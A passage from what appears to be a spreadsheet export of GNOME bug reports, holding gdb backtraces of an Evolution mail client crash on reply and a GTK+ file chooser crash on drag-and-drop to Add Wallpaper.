#2  0x4140de90 in pthread_cond_wait@GLIBC_2.0 () from
/lib/i686/libpthread.so.0
No symbol table info available.
#3  0x4008d86e in e_msgport_wait (mp=0x8164090) at e-msgport.c:511
	_buffer = {__routine = 0x4008d5d6  
  __arg = 0x8164090 __canceltype = 1139908132 __prev = 0x0}
	msg = (EMsg *) 0x4141016f
#4  0x4008e186 in thread_dispatch (din=0x8164038) at e-msgport.c:874
	e = (EThread *) 0x8164038
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x8215f70
	self = 81925
#5  0x4140ef60 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
#6  0x41733327 in clone () from /lib/i686/libc.so.6
No symbol table info available.
Thread 5 (Thread 98308 (LWP 13034)):
#0  0x41411b94 in __pthread_sigsuspend () from
/lib/i686/libpthread.so.0
No symbol table info available.
#1  0x414119d8 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0x4140de90 in pthread_cond_wait@GLIBC_2.0 () from
/lib/i686/libpthread.so.0
No symbol table info available.
#3  0x4008d86e in e_msgport_wait (mp=0x816af98) at e-msgport.c:511
	_buffer = {__routine = 0x4008d5d6  
  __arg = 0x816af98 __canceltype = 1131519540 __prev = 0x0}
	msg = (EMsg *) 0x4141016f
#4  0x4008e186 in thread_dispatch (din=0x816af40) at e-msgport.c:874
	e = (EThread *) 0x816af40
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x0
	self = 98308
#5  0x4140ef60 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
#6  0x41733327 in clone () from /lib/i686/libc.so.6
No symbol table info available.
Thread 4 (Thread 49155 (LWP 13031)):
#0  0x41411b94 in __pthread_sigsuspend () from
/lib/i686/libpthread.so.0
No symbol table info available.
#1  0x414119d8 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0x4140de90 in pthread_cond_wait@GLIBC_2.0 () from
/lib/i686/libpthread.so.0
No symbol table info available.
#3  0x4008d86e in e_msgport_wait (mp=0x8164090) at e-msgport.c:511
	_buffer = {__routine = 0x4008d5d6  
  __arg = 0x8164090 __canceltype = 1123130916 __prev = 0x0}
	msg = (EMsg *) 0x4141016f
#4  0x4008e186 in thread_dispatch (din=0x8164038) at e-msgport.c:874
	e = (EThread *) 0x8164038
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x8213cb8
	self = 49155
#5  0x4140ef60 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
#6  0x41733327 in clone () from /lib/i686/libc.so.6
No symbol table info available.
Thread 3 (Thread 16386 (LWP 13029)):
#0  0x41411b94 in __pthread_sigsuspend () from
/lib/i686/libpthread.so.0
No symbol table info available.
#1  0x414119d8 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0x4140de90 in pthread_cond_wait@GLIBC_2.0 () from
/lib/i686/libpthread.so.0
No symbol table info available.
#3  0x4008d86e in e_msgport_wait (mp=0x8164090) at e-msgport.c:511
	_buffer = {__routine = 0x4008d5d6  
  __arg = 0x8164090 __canceltype = 1114742308 __prev = 0x0}
	msg = (EMsg *) 0x4141016f
#4  0x4008e186 in thread_dispatch (din=0x8164038) at e-msgport.c:874
	e = (EThread *) 0x8164038
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x820eb30
	self = 16386
#5  0x4140ef60 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
#6  0x41733327 in clone () from /lib/i686/libc.so.6
No symbol table info available.
Thread 2 (Thread 32769 (LWP 13028)):
#0  0x4172ab66 in poll () from /lib/i686/libc.so.6
No symbol table info available.
#1  0x4140ea8e in __pthread_manager () from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0x41733327 in clone () from /lib/i686/libc.so.6
No symbol table info available.
Thread 1 (Thread 16384 (LWP 13022)):
#0  0x41415ab6 in waitpid () from /lib/i686/libpthread.so.0
No symbol table info available.
#1  0x404835d8 in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:741
	estatus = 1084418400
	eret = 1180795784
	in_segv = 1
	sa = {__sigaction_handler = {sa_handler = 0 sa_sigaction = 0} 
  sa_mask = {__val = {3221214576 3221212664 1096796052 1180795784
49 
      3221212696 1094791514 1084423668 1084423668 3221212728
1084227836 
      1180795784 1084242750 1082819584 1 4294967290 1084242457 1
      23536624 4 1 3221212744 134670880 0 1084423668 0
1094791854 
      1180795788 1084418400 3221212792 1096499541 1180982784}} 
  sa_flags = 1157627920 sa_restorer = 0x2d}
	pid = 15081
#2  0x08064ce5 in segv_redirect (sig=11) at main.c:455
No locals.
#3  0x4141496c in __pthread_sighandler () from
/lib/i686/libpthread.so.0
No symbol table info available.
#4  
No symbol table info available.
#5  0x41a12885 in camel_strdown (str=0x0) at camel-string-utils.c:103
	s = 0x0
#6  0x418e066f in em_format_part (emf=0x9410650 stream=0x46663d08 
    part=0x926bfa8) at em-format.c:518
	mime_type = 0x0
	dw = (CamelDataWrapper *) 0x0
#7  0x418ea3b4 in emfq_format_message (emf=0x9410650 stream=0x46663d08
    part=0x926bfa8) at em-format-quote.c:369
	emfq = (EMFormatQuote *) 0x9410650
#8  0x418e9bee in emfq_format_clone (emf=0x9410650 folder=0x0 uid=0x0
    msg=0x926bfa8 src=0x0) at em-format-quote.c:143
	emfq = (EMFormatQuote *) 0x9410650
#9  0x418f7f57 in em_utils_message_to_html (message=0x926bfa8 
    credits=0x96723f0 On Thu 2004-05-13 at 15:14 -0600 Liz Pedro
wrote: 
    flags=1) at em-utils.c:1338
	emfq = (EMFormatQuote *) 0x9410650
	mem = (CamelStreamMem *) 0x46663d08
	buf = (GByteArray *) 0x9366f60
	text = 0x96723f0 On Thu 2004-05-13 at 15:14 -0600 Liz Pedro wrote:
#10 0x418f3b0d in composer_set_body (composer=0x93b77e0
message=0x926bfa8)
    at em-composer-utils.c:1506
	sender = (const CamelInternetAddress *) 0x92264d8
	text = 0x85128d0 \030\032Q\b\227Â©&amp;Ã®
	credits = 0x96723f0 On Thu 2004-05-13 at 15:14 -0600 Liz Pedro
wrote:
	format = On Thu 2004-05-13 at 15:14 %+05d %s
wrote:\000Â©Â£@\001\000\000\000\000\000\000\000Â¼wZ\t\237Â©Â£@\001\000\000\000X]eAXÃ“Ã¿Â¿Â®2AAhd\a\b\000\000\000\000Â¼wZ\tZ1AA
\204\001@eeA\000\000\000\000\214vAA
\204\001@pÃ•Ã¿Â¿XÃ“Ã¿Â¿\001\000\000\000&lt;eeAX]eA\230Ã“Ã¿Â¿Ã„Ã‰]\001eeAÂ¼wZ\t\230Ã“Ã¿Â¿
Ãª\006\b\000\000\000\000XGÂ¥A\000\000\000\000Â®2AAÃ $:\teeA\030Ã¦\006\b\214vAA
\204\001@Ã¨P\b...
	name = 0x9663b50 Liz Pedro
	addr = 0x94eae38 EPEDRO@novell.com
	part = (CamelMimePart *) 0x41783fa0
	gconf = (GConfClient *) 0x809f278
	date = 1084461282
	date_offset = -600
#11 0x418f3c53 in em_utils_reply_to_message (message=0x926bfa8 mode=0)
    at em-composer-utils.c:1553
	to = (CamelInternetAddress *) 0x93a24e0
	cc = (CamelInternetAddress *) 0x0
	composer = (EMsgComposer *) 0x93b77e0
	account = (EAccount *) 0x816a420
#12 0x418dbcac in emfv_message_reply (emfv=0x823fcd0 mode=0)
    at em-folder-view.c:1267
	msg = (CamelMimeMessage *) 0x926bfa8
	src = (CamelMimeMessage *) 0x926c1ec
	header = (struct _camel_header_raw *) 0x0
	state = (HTMLEngineSaveState *) 0x9427578
#13 0x418da979 in emfv_popup_reply_sender (w=0x0 emfv=0x823fcd0)
    at em-folder-view.c:630
No locals.
#14 0x418db5bd in emfv_message_reply_sender (uid=0x835bec8
data=0x823fcd0 
    path=0x948ad40 MessageReplySender) at em-folder-view.c:1055
No locals.
#15 0x40571053 in marshal_VOID__USER_DATA_STRING (closure=0x882be78 
    return_value=0xbfffd650 n_param_values=2 param_values=0x9641ef0 
    invocation_hint=0x0 marshal_data=0x0) at bonobo-ui-component.c:221
	callback = 0x418db5aa 
	cc = (GCClosure *) 0x882be78
	data1 = 0x835bec8
	data2 = 0x823fcd0
#16 0x41592c34 in g_closure_invoke (closure=0x882be78 
    return_value=0xbfffd650 n_param_values=2 param_values=0x9641ef0 
    invocation_hint=0x0) at gclosure.c:437
	marshal = 0x40570f79 
	marshal_data = 0x0
	in_marshal = 0
#17 0x407e6db1 in bonobo_closure_invoke_va_list (closure=0x882be78 
    return_value=0xbfffd650 var_args=0xbfffd6ac Ã¸\rW@) at
bonobo-types.c:415
	i = 0
	type = 0
	params = (GArray *) 0x9416a70
#18 0x407e703c in bonobo_closure_invoke (closure=0x882be78
return_type=4)
    at bonobo-types.c:478
	rtype = 4
	return_value = {g_type = 0 data = {{v_int = 0 v_uint = 0 
      v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 
      v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long =
0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0
      v_pointer = 0x0}}}
	var_args = 0xbfffd698 Ãˆ[\032\bÃˆÂ¾5\b@
#19 0x40570e84 in impl_Bonobo_UIComponent_execVerb (servant=0x835bedc 
    cname=0x9356f10 MessageReplySender ev=0xbfffd780)
    at bonobo-ui-component.c:158
	component = (BonoboUIComponent *) 0x835bec8
	verb = (UIVerb *) 0x8834578
#20 0x407e7dfe in _ORBIT_skel_small_Bonobo_UIComponent_execVerb (
    _o_servant=0x835bedc _o_retval=0x0 _o_args=0xbfffd760 _o_ctx=0x0
    _o_ev=0xbfffd780 
    _impl_execVerb=0x40570dec )
    at Bonobo-common.c:1196
No locals.
#21 0x40a1158b in ORBit_c_stub_invoke (obj=0x835c000
methods=0x40809f04 
    method_index=4 ret=0x0 args=0xbfffd760 ctx=0x0 ev=0xbfffd780 
    class_id=12 method_offset=20 
    skel_impl=0x407e7de3
)
    at poa.c:2627
	method_impl = 0x40570dec
	servant = (PortableServer_ServantBase *) 0x835bedc
#22 0x407eae75 in Bonobo_UIComponent_execVerb (_obj=0x835c000 
    cname=0x9356f10 MessageReplySender ev=0xbfffd780) at
Bonobo-stubs.c:1227
	_args = {0xbfffd774}
#23 0x40578911 in real_exec_verb (engine=0x81a1000 
    component_name=0x8c60968 13022-0 verb=0x88b3e68
MessageReplySender)
    at bonobo-ui-engine.c:1533
	ev = {_id = 0x0 _major = 0 _any = {_type = 0x0 _value = 0x0 
    _release = 0 '\0'}}
	verb_cpy = 0x9356f10 MessageReplySender
	component = 0x835c000
#24 0x40578b72 in impl_emit_verb_on (engine=0x81a1000 node=0x8ac8b00)
    at bonobo-ui-engine.c:1591
	verb = 0x88b3e68 MessageReplySender
	sensitive = 0x8505630 1
	cmd_node = (BonoboUINode *) 0x8ac9080
	data = (BonoboUIXmlData *) 0x8d3b768
#25 0x415aa572 in g_cclosure_marshal_VOID__POINTER (closure=0x819e478 
    return_value=0x0 n_param_values=2 param_values=0xbfffdbb0 
    invocation_hint=0xbfffda18 marshal_data=0x405789bf) at
gmarshal.c:601
	callback = 0x405789bf 
	cc = (GCClosure *) 0x819e478
	data1 = 0x81a1000
	data2 = 0x81a0b10
#26 0x41592eee in g_type_class_meta_marshal (closure=0x819e478 
    return_value=0x0 n_param_values=2 param_values=0xbfffdbb0 
    invocation_hint=0xbfffda18 marshal_data=0x4c) at gclosure.c:514
	class = (GTypeClass *) 0x8198528
	callback = 0x405789bf
	offset = 76
#27 0x41592c34 in g_closure_invoke (closure=0x819e478 return_value=0x0
    n_param_values=2 param_values=0xbfffdbb0
invocation_hint=0xbfffda18)
    at gclosure.c:437
	marshal = 0x41592e94 
	marshal_data = 0x4c
	in_marshal = 0
#28 0x415a9136 in signal_emit_unlocked_R (node=0x819e4d8 detail=0 
    instance=0x81a1000 emission_return=0x0
instance_and_params=0xbfffdbb0)
    at gsignal.c:2474
	accumulator = (SignalAccumulator *) 0x0
	emission = {next = 0xbfffdf40 instance = 0x81a1000 ihint = {
    signal_id = 129 detail = 0 run_type = G_SIGNAL_RUN_LAST} 
  state = EMISSION_RUN chain_type = 135924496}
	class_closure = (GClosure *) 0x819e478
	hlist = (HandlerList *) 0x0
	handler_list = (Handler *) 0x0
	return_accu = (GValue *) 0x0
	accu = {g_type = 0 data = {{v_int = 0 v_uint = 0 v_long = 0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0
      v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0
      v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer =
0x0}}}
	signal_id = 129
	max_sequential_handler_number = 120172
	return_value_altered = 0
#29 0x415a80b2 in g_signal_emit_valist (instance=0x81a1000
signal_id=129 
    detail=0 var_args=0xbfffdd40 ) at gsignal.c:2195
	instance_and_params = (GValue *) 0xbfffdbb0
	stack_values = {{g_type = 135924496 data = {{v_int = 135925760 
        v_uint = 135925760 v_long = 135925760 v_ulong = 135925760 
        v_int64 = 135925760 v_uint64 = 135925760 v_float =
4.63614972e-34 
        v_double = 6.7156248400862276e-316 v_pointer = 0x81a1000} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
        v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {
    g_type = 68 data = {{v_int = 145525504 v_uint = 145525504 
        v_long = 145525504 v_ulong = 145525504 v_int64 = 145525504 
        v_uint64 = 145525504 v_float = 1.03845522e-33 
        v_double = 7.1899152120132907e-316 v_pointer = 0x8ac8b00} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
        v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {
    g_type = 1096572152 data = {{v_int = 134669848 v_uint = 134669848
        v_long = 134669848 v_ulong = 134669848 v_int64 =
576460752438093336 
        v_uint64 = 576460752438093336 v_float = 4.05946321e-34 
        v_double = 3.7857671089383838e-270 v_pointer = 0x806e618} {
        v_int = 1096572152 v_uint = 1096572152 v_long = 1096572152 
        v_ulong = 1096572152 v_int64 = 578402594013863160 
        v_uint64 = 578402594013863160 v_float = 13.7726974 
        v_double = 5.4180968799542628e-270 v_pointer = 0x415c5cf8}}}
{
    g_type = 12 data = {{v_int = 134217728 v_uint = 134217728 
        v_long = 134217728 v_ulong = 134217728 v_int64 =
578439787468292096 
        v_uint64 = 578439787468292096 v_float = 3.85185989e-34 
        v_double = 5.4493620375803199e-270 v_pointer = 0x8000000} {
        v_int = 1096572152 v_uint = 1096572152 v_long = 1096572152 
        v_ulong = 1096572152 v_int64 = 4711048889621044472 
        v_uint64 = 4711048889621044472 v_float = 13.7726974 
        v_double = 8917002.0425247997 v_pointer = 0x415c5cf8}}} {
    g_type = 135974080 data = {{v_int = 1079636385 v_uint =
1079636385 
        v_long = 1079636385 v_ulong = 1079636385 v_int64 = 5374603681
        v_uint64 = 5374603681 v_float = 3.40537286 
        v_double = 2.655407038794006e-314 v_pointer = 0x4059f1a1} {
        v_int = 1096876512 v_uint = 1096876512 v_long = 1096876512 
        v_ulong = 1096876512 v_int64 = 578439788430950880 
        v_uint64 = 578439788430950880 v_float = 14.0629578 
        v_double = 5.4493628468000895e-270 v_pointer = 0x416101e0}}}
{
    g_type = 135928520 data = {{v_int = 1 v_uint = 1 v_long = 1 
        v_ulong = 1 v_int64 = 4637002965146664961 
        v_uint64 = 4637002965146664961 v_float = 1.40129846e-45 
        v_double = 103.77545166015626 v_pointer = 0x1} {v_int =
135974080 
        v_uint = 135974080 v_long = 135974080 v_ulong = 135974080 
        v_int64 = 4712275217787571392 v_uint64 = 4712275217787571392 
        v_float = 4.65833718e-34 v_double = 11201216.253271461 
        v_pointer = 0x81accc0}}} {g_type = 3221216344 data = {{
        v_int = 1096725390 v_uint = 1096725390 v_long = 1096725390 
        v_ulong = 1096725390 v_int64 = 584004227800413070 
        v_uint64 = 584004227800413070 v_float = 13.9188366 
        v_double = 1.2682228853590548e-269 v_pointer = 0x415eb38e} {
        v_int = 1079636385 v_uint = 1079636385 v_long = 1079636385 
        v_ulong = 1079636385 v_int64 = 1079636385 v_uint64 =
1079636385 
        v_float = 3.40537286 v_double = 5.334112478287337e-315 
        v_pointer = 0x4059f1a1}}} {g_type = 134670880 data = {{v_int =
0 
        v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0
        v_float = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint
= 0 
        v_long = 0 v_ulong = 0 v_int64 = 4702095208857206784 
        v_uint64 = 4702095208857206784 v_float = 0 v_double = 2254172
        v_pointer = 0x0}}} {g_type = 137312348 data = {{v_int =
1073841184 
        v_uint = 1073841184 v_long = 1073841184 v_ulong = 1073841184
        v_int64 = -4611725015656594400 v_uint64 = 13835019058052957216
        v_float = 2.02368927 v_double = -1.9913408756476727 
        v_pointer = 0x40018420} {v_int = 1096721186 v_uint =
1096721186 
        v_long = 1096721186 v_ulong = 1096721186 
        v_int64 = 578413486051074850 v_uint64 = 578413486051074850 
        v_float = 13.9148273 v_double = 5.4272528259539286e-270 
        v_pointer = 0x415ea322}}} {g_type = </t>
  </si>
  <si>
    <t>GTK+-473954</t>
  </si>
  <si>
    <t>gnome-background-properties: crash on drag-n-drop to Add Wallpaper</t>
  </si>
  <si>
    <t>The bug has been opened on https://bugs.launchpad.net/bugs/128931
Binary package hint: gnome-control-center
Right click desktop...
Change Desktop Background
Add Wallpaper
The Places sidepanel does not show mounted HD volumes with the exception of Filesystem.
Drag a disk volume icon from the desktop over to the Places sidepanel.
A window pops up saying Could not add a bookmark followed by unintelligible symbols.
The Add Wallpaper and Desktop Background Preferences dialogs disappear completely. (program crashes)
This behavior is different than with other GTK2 Open File dialogs for example in Gedit dragging the disk icon adds a new - but invalid - entry to the bookmarks. It can't be accessed but at least doesn't crash the application.
...
Debug backtrace for the crash
Program received signal SIGABRT Aborted.
[Switching to Thread -1227065680 (LWP 5818)]
0xffffe410 in ?? ()
(gdb)  bt
#0  0xffffe410 in ?? ()
#1  0xbfa0af18 in ?? ()
#2  0x00000006 in ?? ()
#3  0x000016ba in ?? ()
#4  0xb7419875 in raise () from /lib/tls/i686/cmov/libc.so.6
#5  0xb741b201 in abort () from /lib/tls/i686/cmov/libc.so.6
#6  0xb7450e5c in __libc_message () from /lib/tls/i686/cmov/libc.so.6
#7  0xb745c92b in free () from /lib/tls/i686/cmov/libc.so.6
#8  0xb76c58c1 in IA__g_free (mem=0x8284870) at /build/buildd/glib2.0-2.14.0/glib/gmem.c:187
#9  0xb76af469 in IA__g_error_free (error=0xbfa0b7d8) at /build/buildd/glib2.0-2.14.0/glib/gerror.c:125
#10 0xb7a08466 in error_dialog (impl=0x84850a8 msg= path= error=0xbfa0b7d8)
    at /build/buildd/gtk+2.0-2.11.6/gtk/gtkfilechooserdefault.c:1086
#11 0xb7a08810 in error_adding_bookmark_dialog (impl=0x84850a8 path=0x0 error=0xbfa0b7d8)
    at /build/buildd/gtk+2.0-2.11.6/gtk/gtkfilechooserdefault.c:1109
#12 0xb7a14d4e in shortcuts_drag_data_received_cb (widget=0x8284870 context=0x86951d0 x=56 y=93 
    selection_data=0xbfa0c164 info=1 time_=3596828327 data=0x84850a8)
    at /build/buildd/gtk+2.0-2.11.6/gtk/gtkfilechooserdefault.c:3521
#13 0xb7a8250e in _gtk_marshal_VOID__OBJECT_INT_INT_BOXED_UINT_UINT (closure=0x84d1c60 return_value=0x0 
    n_param_values=7 param_values=0xbfa0ba3c invocation_hint=0xbfa0b94c marshal_data=0xb7a14bc0)
    at /build/buildd/gtk+2.0-2.11.6/gtk/gtkmarshalers.c:2247
#14 0xb7756772 in IA__g_closure_invoke (closure=0x84d1c60 return_value=0x0 n_param_values=7 param_values=0xbfa0ba3c 
    invocation_hint=0xbfa0b94c) at /build/buildd/glib2.0-2.14.0/gobject/gclosure.c:490
#15 0xb77672fd in signal_emit_unlocked_R (node=0x80af0e8 detail=0 instance=0x8284870 emission_return=0x0 
    instance_and_params=0xbfa0ba3c) at /build/buildd/glib2.0-2.14.0/gobject/gsignal.c:2440
#16 0xb7768807 in IA__g_signal_emit_valist (instance=0x8284870 signal_id=65 detail=0 
    var_args=0xbfa0bca0  ï¿½ï¿½ï¿½\203xÌ·ï¿½Qi\bï¿½uï¿½ï¿½ï¿½\n\bH) at /build/buildd/glib2.0-2.14.0/gobject/gsignal.c:2199
#17 0xb776aefe in IA__g_signal_emit_by_name (instance=0x8284870 detailed_signal=0xb7c109fd drag_data_received)
    at /build/buildd/glib2.0-2.14.0/gobject/gsignal.c:2267
#18 0xb7be4f17 in gtk_drag_selection_received (widget=0x85058c8 selection_data=0xbfa0c164 time=3596828327 
    data=0x8284870) at /build/buildd/gtk+2.0-2.11.6/gtk/gtkdnd.c:1590
#19 0xb7a82abb in _gtk_marshal_VOID__BOXED_UINT (closure=0x88b76b8 return_value=0x0 n_param_values=3 
    param_values=0xbfa0bf0c invocation_hint=0xbfa0be1c marshal_data=0xb7be4dc0)
    at /build/buildd/gtk+2.0-2.11.6/gtk/gtkmarshalers.c:1584
#20 0xb7756772 in IA__g_closure_invoke (closure=0x88b76b8 return_value=0x0 n_param_values=3 param_values=0xbfa0bf0c 
    invocation_hint=0xbfa0be1c) at /build/buildd/glib2.0-2.14.0/gobject/gclosure.c:490
#21 0xb77672fd in signal_emit_unlocked_R (node=0x80acde8 detail=0 instance=0x85058c8 emission_return=0x0 
    instance_and_params=0xbfa0bf0c) at /build/buildd/glib2.0-2.14.0/gobject/gsignal.c:2440
#22 0xb7768807 in IA__g_signal_emit_valist (instance=0x85058c8 signal_id=53 detail=0 
    var_args=0xbfa0c160 \220)L\b\207) at /build/buildd/glib2.0-2.14.0/gobject/gsignal.c:2199
#23 0xb776aefe in IA__g_signal_emit_by_name (instance=0x85058c8 detailed_signal=0xb7c9f65f selection_received)
    at /build/buildd/glib2.0-2.14.0/gobject/gsignal.c:2267
#24 0xb7af2422 in gtk_selection_retrieval_report (info=0x871b5d0 type= 
    format= buffer=0x88c14c8 x-nautilus-desktop:///Volume%204%2C7%20Gio.volume\r\n length=51 
    time=3596828327) at /build/buildd/gtk+2.0-2.11.6/gtk/gtkselection.c:2764
#25 0xb7af27d5 in _gtk_selection_notify (widget=0x85058c8 event=0x86f49a0)
    at /build/buildd/gtk+2.0-2.11.6/gtk/gtkselection.c:2570
---Type  to continue or q  to quit---
#26 0xb7a85ba2 in _gtk_marshal_BOOLEAN__BOXED (closure=0x80add90 return_value=0xbfa0c360 n_param_values=2 
    param_values=0xbfa0c43c invocation_hint=0xbfa0c34c marshal_data=0xb7af26e0)
    at /build/buildd/gtk+2.0-2.11.6/gtk/gtkmarshalers.c:84
#27 0xb7754f89 in g_type_class_meta_marshal (closure=0x80add90 return_value=0xbfa0c360 n_param_values=2 
    param_values=0xbfa0c43c invocation_hint=0xbfa0c34c marshal_data=0xfc)
    at /build/buildd/glib2.0-2.14.0/gobject/gclosure.c:567
#28 0xb7756772 in IA__g_closure_invoke (closure=0x80add90 return_value=0xbfa0c360 n_param_values=2 
    param_values=0xbfa0c43c invocation_hint=0xbfa0c34c) at /build/buildd/glib2.0-2.14.0/gobject/gclosure.c:490
#29 0xb7767943 in signal_emit_unlocked_R (node=0x80addc8 detail=0 instance=0x85058c8 emission_return=0xbfa0c5fc 
    instance_and_params=0xbfa0c43c) at /build/buildd/glib2.0-2.14.0/gobject/gsignal.c:2478
#30 0xb77685cf in IA__g_signal_emit_valist (instance=0x85058c8 signal_id=52 detail=0 var_args=)
    at /build/buildd/glib2.0-2.14.0/gobject/gsignal.c:2209
#31 0xb77689c9 in IA__g_signal_emit (instance=0x85058c8 signal_id=52 detail=0)
    at /build/buildd/glib2.0-2.14.0/gobject/gsignal.c:2243
#32 0xb7bbf2f8 in gtk_widget_event_internal (widget=0x85058c8 event=0x86f49a0)
    at /build/buildd/gtk+2.0-2.11.6/gtk/gtkwidget.c:4674
#33 0xb7a7ee66 in IA__gtk_main_do_event (event=0x86f49a0) at /build/buildd/gtk+2.0-2.11.6/gtk/gtkmain.c:1557
#34 0xb78d2e3a in gdk_event_dispatch (source=0x809b8c0 callback=0 user_data=0x0)
    at /build/buildd/gtk+2.0-2.11.6/gdk/x11/gdkevents-x11.c:2351
#35 0xb76be11c in IA__g_main_context_dispatch (context=0x809b908) at /build/buildd/glib2.0-2.14.0/glib/gmain.c:2061
#36 0xb76c155f in g_main_context_iterate (context=0x809b908 block=1 dispatch=1 self=0x8077470)
    at /build/buildd/glib2.0-2.14.0/glib/gmain.c:2694
#37 0xb76c1909 in IA__g_main_loop_run (loop=0x88beb30) at /build/buildd/glib2.0-2.14.0/glib/gmain.c:2898
#38 0xb79e8442 in IA__gtk_dialog_run (dialog=0x80f4908) at /build/buildd/gtk+2.0-2.11.6/gtk/gtkdialog.c:1038
#39 0x08057a56 in ?? ()
#40 0x080f4908 in ?? ()
#41 0x080a4340 in ?? ()
#42 0xbfa0c898 in ?? ()
#43 0xb7755082 in IA__g_closure_ref (closure=0x8057a30) at /build/buildd/glib2.0-2.14.0/gobject/gclosure.c:360
#44 0xb7763c09 in IA__g_cclosure_marshal_VOID__VOID (closure=0x827f1d8 return_value=0x0 n_param_values=1 
    param_values=0xbfa0caac invocation_hint=0xbfa0c9bc marshal_data=0xb7786678)
    at /build/buildd/glib2.0-2.14.0/gobject/gmarshal.c:77
#45 0xb7756772 in IA__g_closure_invoke (closure=0x827f1d8 return_value=0x0 n_param_values=1 param_values=0xbfa0caac 
    invocation_hint=0xbfa0c9bc) at /build/buildd/glib2.0-2.14.0/gobject/gclosure.c:490
#46 0xb77672fd in signal_emit_unlocked_R (node=0x80f5038 detail=0 instance=0x809c238 emission_return=0x0 
    instance_and_params=0xbfa0caac) at /build/buildd/glib2.0-2.14.0/gobject/gsignal.c:2440
#47 0xb7768807 in IA__g_signal_emit_valist (instance=0x809c238 signal_id=146 detail=0 
    var_args=0xbfa0ccec |\201wï¿½xfxï¿½8ï¿½\t\b\bÍ ï¿½^ \231ï¿½8ï¿½\t\b  \231ï¿½(Í ï¿½\t&lt;vï¿½8ï¿½\t\b8$\n\blÍ ï¿½xfxï¿½lÏ ï¿½\210}\017\bXÍ ï¿½\211Ouï¿½\210}\017\b) at /build/buildd/glib2.0-2.14.0/gobject/gsignal.c:2199
#48 0xb77689c9 in IA__g_signal_emit (instance=0x809c238 signal_id=146 detail=0)
    at /build/buildd/glib2.0-2.14.0/gobject/gsignal.c:2243
#49 0xb798fef7 in IA__gtk_button_clicked (button=0x809c238) at /build/buildd/gtk+2.0-2.11.6/gtk/gtkbutton.c:889
#50 0xb799205e in gtk_real_button_released (button=0x809c238) at /build/buildd/gtk+2.0-2.11.6/gtk/gtkbutton.c:1484
#51 0xb7763c09 in IA__g_cclosure_marshal_VOID__VOID (closure=0x80f7d88 return_value=0x0 n_param_values=1 
    param_values=0xbfa0cf6c invocation_hint=0xbfa0ce7c marshal_data=0xb7992020)
    at /build/buildd/glib2.0-2.14.0/gobject/gmarshal.c:77
---Type  to continue or q  to quit---
#52 0xb7754f89 in g_type_class_meta_marshal (closure=0x80f7d88 return_value=0x0 n_param_values=1 
    param_values=0xbfa0cf6c invocation_hint=0xbfa0ce7c marshal_data=0x1a4)
    at /build/buildd/glib2.0-2.14.0/gobject/gclosure.c:567
#53 0xb7756772 in IA__g_closure_invoke (closure=0x80f7d88 return_value=0x0 n_param_values=1 param_values=0xbfa0cf6c 
    invocation_hint=0xbfa0ce7c) at /build/buildd/glib2.0-2.14.0/gobject/gclosure.c:490
#54 0xb776778a in signal_emit_unlocked_R (node=0x80f7db0 detail=0 instance=0x809c238 emission_return=0x0 
    instance_and_params=0xbfa0cf6c) at /build/buildd/glib2.0-2.14.0/gobject/gsignal.c:2370
#55 0xb7768807 in IA__g_signal_emit_valist (instance=0x809c238 signal_id=145 detail=0 
    var_args=0xbfa0d1ac ï¿½ï¿½Ì·ï¿½ï¿½Ì·ï¿½ï¿½\230ï¿½ï¿½Ñ ï¿½\002) at /build/buildd/glib2.0-2.14.0/gobject/gsignal.c:2199
#56 0xb77689c9 in IA__g_signal_emit (instance=0x809c238 signal_id=145 detail=0)
    at /build/buildd/glib2.0-2.14.0/gobject/gsignal.c:2243
#57 0xb798ff87 in IA__gtk_button_released (button=0x809c238) at /build/buildd/gtk+2.0-2.11.6/gtk/gtkbutton.c:881
#58 0xb7990002 in gtk_button_button_release (widget=0x809c238 event=0x86f4ae0)
    at /build/buildd/gtk+2.0-2.11.6/gtk/gtkbutton.c:1377
#59 0xb7a85ba2 in _gtk_marshal_BOOLEAN__BOXED (closure=0x80acfb0 return_value=0xbfa0d370 n_param_values=2 
    param_values=0xbfa0d44c invocation_hint=0xbfa0d35c marshal_data=0xb798ffc0)
    at /build/buildd/gtk+2.0-2.11.6/gtk/gtkmarshalers.c:84
#60 0xb7754f89 in g_type_class_meta_marshal (closure=0x80acfb0 return_value=0xbfa0d370 n_param_values=2 
    param_values=0xbfa0d44c invocation_hint=0xbfa0d35c marshal_data=0xb4)
    at /build/buildd/glib2.0-2.14.0/gobject/gclosure.c:567
#61 0xb7756772 in IA__g_closure_invoke (closure=0x80acfb0 return_value=0xbfa0d370 n_param_values=2 
    param_values=0xbfa0d44c invocation_hint=0xbfa0d35c) at /build/buildd/glib2.0-2.14.0/gobject/gclosure.c:490
#62 0xb7767943 in signal_emit_unlocked_R (node=0x80ac1b0 detail=0 instance=0x809c238 emission_return=0xbfa0d60c 
